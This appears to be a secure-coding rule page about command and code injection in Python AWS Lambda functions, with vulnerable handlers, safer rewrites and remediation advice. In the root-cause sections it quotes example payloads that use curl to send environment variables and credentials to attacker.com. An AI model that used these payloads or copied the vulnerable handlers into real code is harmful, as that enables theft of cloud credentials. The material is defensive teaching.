Python AWS Lambda Dangerous System Call

Critical Risk Code Injection
pythonaws-lambdasystem-callscode-injectionserverlessos-system

What it is

The AWS Lambda function uses dangerous system call functions like os.system(), os.popen(), or eval() with user-controlled input, creating command injection and code execution vulnerabilities. In the Lambda environment, this can lead to compromise of the execution environment, unauthorized access to AWS services, or data exfiltration.

# Vulnerable: Dangerous system calls in Lambda import os import json def lambda_handler(event, context): user_command = event.get('command', '') # Extremely dangerous: Direct command execution result = os.system(user_command) return { 'statusCode': 200, 'body': json.dumps({'result': result}) } # Another vulnerable pattern def execute_script(event, context): script_code = event.get('script', '') variables = event.get('variables', {}) # Dangerous: Dynamic code execution try: # User can execute arbitrary Python code exec(script_code, variables) return {'status': 'executed'} except Exception as e: return {'error': str(e)} # File operations with user input def process_files(event, context): filename = event['filename'] operation = event['operation'] # Dangerous: Command injection via filename command = f"find /tmp -name '{filename}' -exec {operation} {{}} \;" # Very dangerous output = os.popen(command).read() return {'output': output} # Mathematical operations with eval def calculate(event, context): expression = event.get('expression', '') try: # Dangerous: eval can execute arbitrary code result = eval(expression) return {'result': result} except Exception as e: return {'error': str(e)}
# Secure: Safe alternatives to system calls in Lambda import json import re import math import operator import boto3 from decimal import Decimal def lambda_handler(event, context): operation = event.get('operation', '') # Use allowlist of operations allowed_operations = { 'list_files': list_s3_files, 'get_file_info': get_file_metadata, 'calculate': safe_calculate, 'convert_data': convert_data_format } if operation not in allowed_operations: return { 'statusCode': 400, 'body': json.dumps({'error': 'Operation not allowed'}) } try: result = allowed_operations[operation](event) return { 'statusCode': 200, 'body': json.dumps(result) } except Exception as e: return { 'statusCode': 500, 'body': json.dumps({'error': 'Operation failed'}) } # Secure file operations using AWS services def list_s3_files(event): bucket_name = event.get('bucket_name', '') prefix = event.get('prefix', '') # Validate inputs if not re.match(r'^[a-zA-Z0-9.-]+$', bucket_name): raise ValueError('Invalid bucket name') if not re.match(r'^[a-zA-Z0-9/._-]*$', prefix): raise ValueError('Invalid prefix') # Use AWS SDK instead of shell commands s3_client = boto3.client('s3') try: response = s3_client.list_objects_v2( Bucket=bucket_name, Prefix=prefix, MaxKeys=100 ) files = [] for obj in response.get('Contents', []): files.append({ 'key': obj['Key'], 'size': obj['Size'], 'last_modified': obj['LastModified'].isoformat() }) return {'files': files} except Exception as e: raise Exception('Failed to list files') def get_file_metadata(event): bucket_name = event.get('bucket_name', '') file_key = event.get('file_key', '') # Validate inputs if not re.match(r'^[a-zA-Z0-9.-]+$', bucket_name): raise ValueError('Invalid bucket name') if not re.match(r'^[a-zA-Z0-9/._-]+$', file_key): raise ValueError('Invalid file key') s3_client = boto3.client('s3') try: response = s3_client.head_object(Bucket=bucket_name, Key=file_key) return { 'size': response['ContentLength'], 'content_type': response.get('ContentType', 'unknown'), 'last_modified': response['LastModified'].isoformat(), 'etag': response['ETag'] } except Exception as e: raise Exception('Failed to get file metadata') # Safe mathematical operations def safe_calculate(event): expression = event.get('expression', '') # Validate expression format if not re.match(r'^[0-9+\-*/().\s]+$', expression): raise ValueError('Invalid expression format') # Use safe evaluation with limited operations allowed_operators = { '+': operator.add, '-': operator.sub, '*': operator.mul, '/': operator.truediv, '**': operator.pow } # Simple expression parser (for basic operations) try: # Remove spaces expression = expression.replace(' ', '') # For simple cases, use a safe parser # This is a simplified example - use a proper math parser in production if '+' in expression: parts = expression.split('+') result = sum(float(part) for part in parts) elif '-' in expression and expression.count('-') == 1: parts = expression.split('-') result = float(parts[0]) - float(parts[1]) elif '*' in expression: parts = expression.split('*') result = 1 for part in parts: result *= float(part) else: result = float(expression) return {'result': result} except (ValueError, ZeroDivisionError) as e: raise ValueError('Invalid calculation') # Safe data conversion def convert_data_format(event): data = event.get('data', {}) target_format = event.get('format', 'json') allowed_formats = ['json', 'csv', 'xml'] if target_format not in allowed_formats: raise ValueError('Format not supported') try: if target_format == 'json': return {'converted': json.dumps(data)} elif target_format == 'csv': # Convert to CSV format (simplified) if isinstance(data, list) and all(isinstance(item, dict) for item in data): if data: headers = list(data[0].keys()) csv_lines = [','.join(headers)] for item in data: row = [str(item.get(header, '')) for header in headers] csv_lines.append(','.join(row)) return {'converted': '\n'.join(csv_lines)} raise ValueError('Data not suitable for CSV conversion') elif target_format == 'xml': # Simple XML conversion (use proper library in production) xml_content = '' for key, value in data.items(): xml_content += f'<{key}>{value}' xml_content += '' return {'converted': xml_content} except Exception as e: raise Exception('Conversion failed') # Configuration-based processing def process_with_config(event, context): # Use environment variables instead of dynamic execution processing_mode = os.environ.get('PROCESSING_MODE', 'safe') max_items = int(os.environ.get('MAX_ITEMS', '100')) data = event.get('data', []) # Validate data length if len(data) > max_items: raise ValueError(f'Too many items (max: {max_items})') # Process based on configuration if processing_mode == 'safe': # Safe processing only processed = [] for item in data: if isinstance(item, dict) and 'value' in item: processed.append({ 'value': float(item['value']) * 2, 'processed': True }) return {'processed_data': processed} else: raise ValueError('Processing mode not supported')

💡 Why This Fix Works

See fix suggestions for detailed explanation.

Why it happens

AWS Lambda functions invoke os.system() with data extracted from Lambda event payloads, directly passing user-controlled strings to the operating system shell without sanitization or validation, creating critical command injection vulnerabilities. The os.system(command) function executes command through /bin/sh -c, making the entire string subject to shell interpretation where special characters enable command chaining, output redirection, and arbitrary code execution. Lambda event sources like API Gateway, ALB, S3, SQS, or EventBridge deliver user-controlled data that developers pass directly to os.system(): os.system(event['user_command']) enables attackers to inject malicious commands. API Gateway Lambda proxy integrations provide queryStringParameters, pathParameters, and request bodies that reach os.system() without validation, particularly in REST APIs where developers assume client-side validation prevents malicious input. The serverless execution model's stateless nature encourages using os.system() for quick file operations or system commands without considering security implications, as developers focus on business logic rather than security controls. Lambda's ephemeral /tmp filesystem and limited execution environment prompt developers to use shell commands for file manipulations that could be accomplished with Python libraries or AWS services, inadvertently introducing command injection vectors. Return values from os.system() indicate only exit status, not actual command output, leading developers to use os.popen() or subprocess with shell=True to capture output, further exposing vulnerabilities.

Root causes

Using os.system() with User-Provided Input from Lambda Events

AWS Lambda functions invoke os.system() with data extracted from Lambda event payloads, directly passing user-controlled strings to the operating system shell without sanitization or validation, creating critical command injection vulnerabilities. The os.system(command) function executes command through /bin/sh -c, making the entire string subject to shell interpretation where special characters enable command chaining, output redirection, and arbitrary code execution. Lambda event sources like API Gateway, ALB, S3, SQS, or EventBridge deliver user-controlled data that developers pass directly to os.system(): os.system(event['user_command']) enables attackers to inject malicious commands. API Gateway Lambda proxy integrations provide queryStringParameters, pathParameters, and request bodies that reach os.system() without validation, particularly in REST APIs where developers assume client-side validation prevents malicious input. The serverless execution model's stateless nature encourages using os.system() for quick file operations or system commands without considering security implications, as developers focus on business logic rather than security controls. Lambda's ephemeral /tmp filesystem and limited execution environment prompt developers to use shell commands for file manipulations that could be accomplished with Python libraries or AWS services, inadvertently introducing command injection vectors. Return values from os.system() indicate only exit status, not actual command output, leading developers to use os.popen() or subprocess with shell=True to capture output, further exposing vulnerabilities.

Dynamic Code Execution with eval() or exec() Functions on Event Data

Lambda functions use Python's eval() or exec() to dynamically execute code strings derived from Lambda events, enabling attackers to execute arbitrary Python code within the Lambda execution environment with full access to boto3, AWS credentials, and Lambda function permissions. The eval(expression) function parses and evaluates Python expressions, while exec(code) executes arbitrary Python statements, both treating string inputs as executable code without sandboxing or restrictions. Serverless applications implement flexible data processing, mathematical calculations, or rule evaluation by accepting formulas or logic as Lambda event parameters: eval(event['formula']) allows attackers to inject malicious Python code disguised as mathematical expressions. API endpoints that accept user-defined transformation functions, filtering logic, or custom validators execute this code using eval()/exec(): event['transform_function'] might contain '__import__("os").system("curl attacker.com?data=$(cat /proc/self/environ)")' to exfiltrate environment variables containing AWS credentials. Lambda functions implementing configuration-as-code or programmable APIs use eval() to parse configuration syntax, not recognizing that this enables code injection rather than just data injection. Developers familiar with JavaScript's JSON.parse() may not realize Python's eval() executes code rather than merely parsing data structures, leading to security vulnerabilities when treating eval() as a safe deserialization mechanism. AWS Lambda execution roles grant functions permissions to AWS services via IAM policies, and code injected through eval()/exec() inherits these permissions, enabling attackers to access S3 buckets, DynamoDB tables, invoke other Lambda functions, or modify AWS resources.

Using os.popen() to Execute Commands with Untrusted Lambda Data

Lambda functions invoke os.popen() to execute shell commands and capture output, passing user-controlled data from Lambda events directly into command strings without validation, enabling command injection attacks with immediate output feedback for attackers. The os.popen(command, mode) function opens a pipe to execute command through a shell, returning a file-like object that provides command output, making it attractive for Lambda functions needing to process shell command results. Lambda file processing workflows use os.popen() to invoke utilities like file, grep, awk, or custom scripts: output = os.popen(f'file {s3_key}').read() enables injection through S3 object keys that attackers control. API Gateway Lambda integrations that process user-uploaded filenames, search queries, or data filters pass these values to os.popen(): os.popen(f'grep "{search_term}" /tmp/data.txt').read() allows injection through search_term containing quote escapes and command separators. Unlike os.system() which only returns exit status, os.popen() provides command output, making it more dangerous as attackers receive immediate feedback, can exfiltrate data directly through output channels, and can iterate injection attempts to refine attacks. Lambda functions implementing log analysis, text processing, or data extraction use os.popen() to leverage shell utilities rather than Python libraries, introducing command injection risks for perceived convenience. The two-way communication provided by os.popen() enables attackers to not only execute commands but also retrieve results, list directory contents, read sensitive files, or query AWS metadata services to steal credentials.

String Formatting or Concatenation in System Calls Without Escaping

Lambda function code constructs system call arguments using Python f-strings, str.format(), percent-formatting, or string concatenation that embed Lambda event parameters directly into command strings without escaping shell metacharacters, making command injection trivial. F-string patterns like os.system(f'aws s3 cp s3://{bucket}/{key} /tmp/') interpolate bucket and key from Lambda events where attackers control these values: injecting key = 'file.txt; curl attacker.com' chains commands to exfiltrate data. String concatenation patterns combine command components: os.system('convert ' + input_file + ' ' + output_file) enables injection through input_file or output_file parameters that contain semicolons, pipes, backticks, or other shell operators. The str.format() method suffers identical issues: os.system('grep "{}" {}'.format(pattern, filename)) treats special characters in pattern or filename as shell metacharacters rather than literal strings. Lambda functions processing S3 event notifications construct commands using object keys: os.system(f'file /tmp/{event["Records"][0]["s3"]["object"]["key"]}') is vulnerable when S3 keys contain shell metacharacters, and S3 permits arbitrary key names. Developers familiar with SQL parameterized queries fail to apply equivalent principles to shell commands, not recognizing that string formatting produces a single command string subject to shell interpretation rather than safely separating command and arguments. Python's lack of built-in shell escaping functions and the fragility of manual escaping with replace() or regex leads developers to construct commands through string formatting without proper security controls.

Missing Input Validation Before System Function Calls

Lambda functions execute system calls on Lambda event data without implementing validation, sanitization, allowlist checks, or format verification, trusting that upstream API Gateway validators, AWS WAF rules, or event source configurations prevent malicious input from reaching system call contexts. Serverless developers rely on API Gateway request validation schemas that verify JSON structure, data types, and required fields but do not validate content for command injection payloads: a schema requiring a string filename doesn't prevent values containing shell metacharacters. AWS WAF rules configured for SQL injection or XSS detection miss command injection patterns, particularly when attackers encode or obfuscate payloads to bypass pattern matching. Lambda functions processing data from internal AWS services like S3, DynamoDB, SQS, or Step Functions omit validation under the assumption that internal services provide trusted data, ignoring scenarios where attackers populate these services through application entry points. Event-driven architectures where Lambda functions respond to S3 uploads, DynamoDB streams, or SNS notifications process attacker-controlled data without recognizing the security boundary: S3 object keys, DynamoDB attribute values, or SNS message bodies may contain injection payloads. Inadequate error handling that catches exceptions from system calls without logging input parameters prevents detection of injection attempts and enables attackers to probe command syntax iteratively without triggering alerts. IAM policies granting Lambda functions broad AWS permissions amplify risks: functions with s3:*, dynamodb:*, or lambda:* permissions enable injected code to leverage boto3 and AWS CLI to access sensitive resources, modify configurations, or pivot to other AWS services.

Fixes

1

Replace System Calls with AWS SDK (boto3) Operations

Eliminate os.system(), os.popen(), and shell command invocations from Lambda functions by using boto3 AWS SDK operations that provide type-safe, parameterized interfaces to AWS services without shell interpretation or code execution risks. Replace file operations with S3 API calls: instead of os.system('aws s3 cp'), use s3_client.download_file(), upload_file(), copy_object(), or put_object() that accept parameters as function arguments rather than shell strings. For listing resources, use boto3 list operations: s3_client.list_objects_v2(), dynamodb_table.scan(), lambda_client.list_functions() provide structured responses without requiring shell command parsing. Replace command-based data retrieval with direct API calls: ec2_client.describe_instances(), rds_client.describe_db_instances(), ecs_client.list_tasks() eliminate need for AWS CLI subprocess invocations. For cross-service orchestration, use lambda_client.invoke() to call other Lambda functions with JSON payloads, invoke Step Functions state machines with sfn_client.start_execution(), or publish messages via sns_client.publish() and sqs_client.send_message() rather than using curl or wget through os.system(). Configure boto3 with appropriate retry logic, timeout settings, and error handling: use botocore.config.Config to set read_timeout, connect_timeout, and retry strategies. Implement least privilege IAM policies that grant Lambda execution roles only specific actions on specific resources rather than broad permissions: restrict S3 access to specific buckets, DynamoDB access to specific tables. Use boto3 resource-level APIs for higher-level abstractions: s3_resource.Bucket(name).objects.filter(Prefix=prefix) provides Pythonic interfaces compared to client-level operations.

2

Use Native Python Libraries Instead of Shell Command Utilities

Replace shell utility invocations with native Python libraries that provide equivalent functionality through safe APIs immune to command injection: use pathlib for file operations, json/xml modules for data parsing, hashlib for checksums, and specialized libraries for format conversions. For file type detection, use python-magic library instead of 'file' command: import magic; mime = magic.from_file(filepath, mime=True) safely identifies file types. For text processing replacing grep/sed/awk, use Python's re module: re.findall(pattern, text) for searching, str.replace() for substitution, str.split() and list comprehensions for filtering. For compression operations, use zipfile, gzip, tarfile, or bz2 modules instead of shell tar/gzip commands: zipfile.ZipFile(archive, 'w').write(filename) creates archives safely. For PDF processing, use PyPDF2, pdfplumber, or pdfminer libraries instead of 'pdfinfo' or 'pdftotext' shell commands: PyPDF2.PdfFileReader(file).getNumPages() extracts PDF metadata. For image processing, use Pillow (PIL) instead of ImageMagick: Image.open(input_path).resize((800, 600)).save(output_path) resizes images. For HTTP operations, use requests library instead of curl: requests.get(url, timeout=5) fetches URLs safely with automatic parameter escaping. For mathematical calculations, use math, decimal, or numpy modules instead of eval(): decimal.Decimal operations provide safe arithmetic. For JSON operations, use json.loads() and json.dumps() instead of jq subprocess: parsed = json.loads(json_string) safely parses JSON without code execution risks. Install libraries in Lambda deployment packages or Lambda layers to ensure availability at runtime.

3

Validate and Sanitize All User Input from Lambda Events

Implement comprehensive input validation for all Lambda event data using strict schemas, allowlists, regular expressions, and type checking to prevent malicious input from reaching any system call contexts or dynamic code execution paths. Define event schemas using JSON Schema and validate all incoming events at Lambda function entry points: use jsonschema.validate(event, schema) to enforce structure, types, and required fields before processing. Apply allowlist validation for enumerated inputs: operations = ['read', 'write', 'list']; if event['operation'] not in operations: raise ValueError('Invalid operation') ensures only permitted values proceed. Use regular expressions to restrict string inputs to safe character sets: re.match(r'^[a-zA-Z0-9._-]+$', filename) permits only alphanumeric characters, dots, hyphens, and underscores, blocking shell metacharacters like semicolons, pipes, backticks, and dollar signs. Implement length limits on all string parameters: MAX_LENGTH = 255; if len(input_string) > MAX_LENGTH: raise ValueError('Input exceeds maximum length') prevents buffer overflows and limits attack payload size. Validate file paths to prevent directory traversal: Path(file_path).resolve().is_relative_to(safe_base_path) ensures paths remain within permitted directories using pathlib's resolve() to normalize paths and eliminate .. components. Check for and reject shell metacharacters explicitly: FORBIDDEN = set(';|&$`\n()'); if any(c in user_input for c in FORBIDDEN): raise ValueError('Invalid characters') blocks obvious injection attempts. Use type coercion for numeric inputs: count = int(event['count']) raises ValueError for non-integer input before it reaches system contexts. Log validation failures to CloudWatch with sanitized input samples for security monitoring: logger.warning(f'Validation failed: {sanitized_input[:100]}'). Implement input sanitization as a last resort, preferring rejection over transformation: sanitized = re.sub(r'[^a-zA-Z0-9]', '', input) removes special characters.

4

Implement Strict Allowlists for Permitted Operations and Parameters

Define and enforce allowlists that specify exactly which operations can be executed and what parameter values are acceptable, validating all Lambda event operations against these allowlists before any processing to prevent arbitrary code execution or command injection. Create operation allowlists as dictionaries mapping permitted operation names to handler functions: ALLOWED_OPERATIONS = {'list_files': list_files_handler, 'get_metadata': metadata_handler, 'process_data': data_processor}; if event['operation'] not in ALLOWED_OPERATIONS: raise ValueError('Operation not permitted') ensures only pre-approved operations execute. For file extensions, maintain strict allowlists: ALLOWED_EXTENSIONS = {'.txt', '.json', '.csv', '.pdf'}; if Path(filename).suffix not in ALLOWED_EXTENSIONS: raise ValueError('File type not supported') restricts processing to known safe formats. Implement MIME type validation using python-magic: ALLOWED_MIMES = {'text/plain', 'application/json', 'text/csv'}; detected_mime = magic.from_buffer(file_content, mime=True); if detected_mime not in ALLOWED_MIMES: raise ValueError('MIME type not allowed') validates actual file content rather than trusting extensions. For bucket names and resource identifiers, use allowlists: PERMITTED_BUCKETS = {'company-data-prod', 'company-uploads-prod'}; if bucket_name not in PERMITTED_BUCKETS: raise ValueError('Bucket not allowed') prevents access to unintended S3 buckets. Create parameter validation functions for reusable validation logic: validate_safe_path(path), validate_safe_identifier(id), validate_safe_string(s) encapsulate validation rules. Use configuration loaded from AWS Systems Manager Parameter Store or Secrets Manager for allowlist definitions: allowed_operations = json.loads(ssm_client.get_parameter(Name='/app/allowed_operations')['Parameter']['Value']) enables operational control without code changes. Document security justification for each allowed operation and review allowlists during security audits. Implement comprehensive audit logging: log all operation invocations with operation name, parameters, result status, and Lambda request ID to CloudWatch for security monitoring and forensics.

5

Use Lambda Environment Variables for Configuration Instead of Dynamic Execution

Replace dynamic code execution patterns using eval() or exec() with Lambda environment variables that provide static configuration values, eliminating code injection risks while maintaining operational flexibility. Define configuration values as Lambda environment variables: set PROCESSING_MODE, MAX_ITEMS, ALLOWED_OPERATIONS in Lambda function configuration rather than accepting these values from events or executing code to compute them. Access environment variables via os.environ in Lambda code: processing_mode = os.environ.get('PROCESSING_MODE', 'strict') retrieves configuration safely without code execution. For mathematical operations, implement safe calculation functions using operator module: OPERATORS = {'+': operator.add, '-': operator.sub, '*': operator.mul, '/': operator.truediv}; result = OPERATORS[op](a, b) executes arithmetic without eval(). For rule-based logic, implement decision trees or lookup tables: rules = {'premium_user': lambda x: x.tier == 'premium', 'high_value': lambda x: x.value > 1000}; if rules[rule_name](user): process() evaluates logic safely. For data transformations, use predefined transformation functions: TRANSFORMATIONS = {'uppercase': str.upper, 'lowercase': str.lower, 'strip': str.strip}; result = TRANSFORMATIONS[transform_name](data) applies transformations without code execution. Use AWS AppConfig or Parameter Store for complex configuration that requires frequent updates: config = appconfig_client.get_configuration() retrieves JSON configuration without deploying new Lambda versions. Implement feature flags via environment variables: FEATURE_ADVANCED_PROCESSING = os.environ.get('FEATURE_ADVANCED_PROCESSING') == 'true' enables conditional logic without dynamic code. For template rendering, use safe templating libraries like Jinja2 with autoescape enabled: Template(template_string, autoescape=True).render(context) prevents code injection in templates. Document all environment variables in Lambda function description and deployment templates. Use Infrastructure as Code (CloudFormation, Terraform, SAM) to define environment variables declaratively.

6

Leverage AWS Managed Services for File Processing and Data Operations

Replace shell command-based file processing with AWS managed services that provide secure, scalable alternatives: use AWS Textract for OCR, AWS Transcribe for audio transcription, AWS Translate for language translation, AWS Rekognition for image analysis, and AWS Comprehend for text analysis. For document format conversion, use AWS Lambda with language-specific libraries packaged in Lambda layers: pypdf2 for PDF, python-docx for Word documents, openpyxl for Excel files instead of LibreOffice or pandoc subprocess invocations. Leverage S3 Object Lambda to process data as it's retrieved: implement transformations, redactions, or format conversions inline without separate Lambda processing steps that might use shell commands. Use AWS Glue for ETL operations instead of Lambda functions with subprocess-based data transformation: Glue provides managed PySpark environments for data processing at scale. Implement media processing with AWS Elastic Transcoder or AWS Elemental MediaConvert instead of ffmpeg subprocess: these services provide APIs for video transcoding, thumbnail generation, and format conversion. For image processing beyond simple resizing, use AWS Rekognition for object detection, facial analysis, and text extraction from images: rekognition_client.detect_labels(Image={'S3Object': {'Bucket': bucket, 'Name': key}}) analyzes images via API. Use AWS Lambda Layers to package native libraries and Python wrappers: create layers containing Pillow, NumPy, or other data processing libraries that eliminate need for shell command invocations. Implement Step Functions state machines to orchestrate complex multi-step processing workflows: coordinate multiple Lambda functions, AWS services, and conditional logic without shell scripting. Design Lambda functions with single responsibilities that use AWS service APIs exclusively, avoiding general-purpose command execution capabilities. Document rationale for any subprocess usage and architect alternatives using managed services during code reviews.

Detect This Vulnerability in Your Code

Sourcery automatically identifies python aws lambda dangerous system call and many other security issues in your codebase.